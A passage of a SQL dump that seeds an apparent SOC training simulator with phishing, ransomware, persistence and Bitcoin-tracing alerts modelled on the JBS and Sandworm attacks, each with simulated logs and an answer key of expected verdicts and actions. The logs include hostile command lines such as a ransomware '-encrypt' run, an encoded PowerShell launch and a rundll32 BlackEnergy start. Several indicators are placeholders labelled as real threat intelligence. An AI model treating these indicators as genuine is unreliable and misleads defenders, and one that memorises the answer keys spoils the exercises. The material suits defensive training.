[Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(774, 'Initial Compromise via Phishing', 'high', 'Employee email system logs', 'A spear-phishing email was detected targeting JBS Foods employees. The email contained a malicious link designed to gain initial access to the network. The email was sent from a suspicious external IP address and included a known malicious attachment.', 'Phishing Attack', 'T1566.002 - Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_id\":\"1234567890\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"sender_email\":\"attacker@evilmail.com\",\"recipient_email\":\"employee@jbsfoods.com\",\"subject\":\"Urgent: Action Required\",\"malicious_link\":\"http://malicious-link.com/securelogin\",\"attachment\":{\"filename\":\"Important_Document.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_action\":\"clicked_link\"}', '2026-01-11 23:35:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP used in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL hosting credential theft page\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Associated with phishing campaign\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@evilmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Sender identified in multiple phishing 
incidents\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Compromise via Phishing\",\"date\":\"2026-02-01T20:32:22.421Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(775, 'Ransomware Deployment', 'critical', 'Endpoint detection and response (EDR) tools', 'Upon gaining access, the attackers executed the Sodinokibi ransomware, encrypting key systems to disrupt operations and increase the urgency of the ransom demand. The ransomware was executed on a critical server, leading to widespread encryption of important files.', 'Malware Execution', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T15:43:21Z\",\"event_id\":\"EDR-123456\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"file_executed\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\sodinokibi.exe\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"process_id\":4567,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\sodinokibi.exe -encrypt C:\\\\ImportantFiles\",\"file_size\":\"51200\",\"malicious\":true,\"detection_method\":\"behavioral\",\"severity\":\"Critical\"}', '2026-01-11 23:35:35', '2026-02-16 18:01:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware deployment campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Sodinokibi ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"internal\",\"details\":\"User account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(776, 'Establishing Persistence', 'high', 'Network traffic analysis', 'The attackers set up persistence mechanisms using scheduled tasks and registry modifications, ensuring continuous access even after system reboots. Network traffic analysis revealed communication with a known malicious IP and the presence of a suspicious scheduled task and registry modification.', 'Persistence Mechanism', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:52:30Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"event\":\"scheduled_task_creation\",\"task_name\":\"UpdateScheduler\",\"task_path\":\"\\\\Microsoft\\\\Windows\\\\UpdateTasks\\\\\",\"registry_modification\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"UpdateHelper\",\"value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\updatehelper.exe\\\"\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"protocol\":\"HTTP\",\"request_url\":\"http://malicious-updates.com/check\"}', '2026-01-11 23:35:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP known to be associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"updatehelper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected executable found in system 
directory\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-updates.com/check\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication in previous attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(777, 'Lateral Movement to Critical Systems', 'critical', 'Network segmentation logs', 'The attackers leveraged compromised credentials to move laterally, reaching critical systems that would amplify the impact of the encryption and pressure JBS Foods into payment.', 'Network Propagation', 'T1021.002 - SMB/Windows Admin Shares', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:25:37Z\",\"event_type\":\"network_access\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"action\":\"successful_login\",\"file_accessed\":\"confidential_financials.xlsx\",\"hash\":\"b2a5d6f7c3e9d1b7f4a8e3b9c1d7e7f9\",\"log_id\":\"evt-20231010142537\",\"description\":\"User jdoe successfully accessed critical file on 10.1.2.45 using compromised credentials.\"}', '2026-01-11 23:35:35', '2026-02-16 18:02:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical financial server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Account compromised in recent phishing campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2a5d6f7c3e9d1b7f4a8e3b9c1d7e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset 
Database\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(778, 'Bitcoin Ransom Payment and Fund Tracing - Step 5', 'high', 'Blockchain analysis platforms', 'During the tracing of the $11 million ransom payment, authorities identified a transaction chain where the attackers attempted to obfuscate funds through a series of complex transactions. This step involved multiple Bitcoin addresses and associated transactions, analyzing the flow and linking it to known malicious actor wallets.', 'Financial Transaction Analysis', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"transaction_id\":\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\",\"source_address\":\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\",\"destination_addresses\":[\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\",\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\"],\"amount\":\"0.5 BTC\",\"timestamp\":\"2023-10-12T14:48:00Z\",\"related_ips\":[\"45.76.123.88\",\"10.0.0.23\"],\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"related_domains\":[\"maliciouswallet.com\"],\"usernames\":[\"attacker_user\"]}', '2026-01-11 23:35:35', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.123.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP used for monitoring transactions\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"maliciouswallet.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis 
Tool\",\"verdict\":\"malicious\",\"details\":\"Domain associated with cryptocurrency laundering\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Behavior Analytics\",\"verdict\":\"suspicious\",\"details\":\"Username linked to unauthorized transactions\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 
BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 
BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(779, 'Initial Access via Phishing Emails', 'high', 'Email logs and employee reports', 'Sandworm initiated their attack with a spear-phishing campaign targeting Ukrainian power company employees. The emails contained malicious attachments that served as the attack\'s entry point.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:00Z\",\"source_ip\":\"185.92.220.54\",\"destination_ip\":\"10.0.0.25\",\"subject\":\"Urgent: Update Required\",\"sender_email\":\"it-support@fakedomain.ua\",\"recipient_email\":\"employee@ukrpower.ua\",\"attachment_name\":\"Update_Instruction.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"email_client\":\"Outlook\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"status\":\"Delivered\"}', '2026-01-11 23:37:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Sandworm IP used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"it-support@fakedomain.ua\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Spoofed email used in targeted phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Update_Instruction.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains macros that attempt to download additional payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Sandworm phishing 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Emails\",\"date\":\"2026-02-01T20:32:22.426Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(780, 'Execution of BlackEnergy Malware', 'critical', 'Endpoint security logs', 'Upon gaining initial access, Sandworm deployed the BlackEnergy malware to the compromised systems, enabling further malicious activities within the network.', 'Malware Deployment', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:52:30Z\",\"event_id\":\"4624\",\"event_type\":\"Process Creation\",\"host\":\"compromised-host\",\"source_ip\":\"93.184.216.34\",\"destination_ip\":\"10.0.5.23\",\"user\":\"SYSTEM\",\"process_name\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\",\"command_line\":\"rundll32.exe C:\\\\Users\\\\Public\\\\blackenergy.dll,Start\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"blackenergy.dll\",\"user_id\":\"S-1-5-18\"}', '2026-01-11 23:37:37', '2026-02-16 18:00:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"93.184.216.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Sandworm-associated IP used in past malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Registry\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with BlackEnergy malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blackenergy.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Research Database\",\"verdict\":\"malicious\",\"details\":\"Filename used by BlackEnergy malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
